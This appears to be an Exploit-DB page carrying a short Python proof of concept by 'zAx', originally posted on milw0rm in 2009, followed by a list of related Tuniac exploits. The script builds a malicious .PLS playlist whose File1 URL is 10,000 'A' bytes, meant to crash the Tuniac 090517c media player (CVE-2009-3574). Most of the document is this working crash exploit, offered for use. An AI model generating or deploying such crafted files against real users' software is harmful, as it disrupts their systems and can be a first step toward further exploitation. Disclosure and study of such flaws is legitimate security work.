#!/usr/bin/env python # Tuniac v.090517c (.PLS) Crash PoC # By : zAx # http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download buffer = ("[playlist]\x0ANumberOfEntries=1\x0AFile1=http://" + "\x41" * (10000)); f = open('Crash_Poc.PLS','w'); f.write(buffer); f.close(); # milw0rm.com [2009-09-14]
Related Exploits
Trying to match CVEs (1): CVE-2009-3574Trying to match OSVDBs (1): 58882
Other Possible E-DB Search Terms: Tuniac 090517c, Tuniac
Date | D | V | Title | Author |
---|---|---|---|---|
2010-08-19 |
![]() |
Tuniac 100723 - Denial of Service | d4rk-h4ck3r | |
2009-08-05 |
![]() |
Tuniac 090517c - '.m3u' Local File Crash (PoC) | Dr_IDE |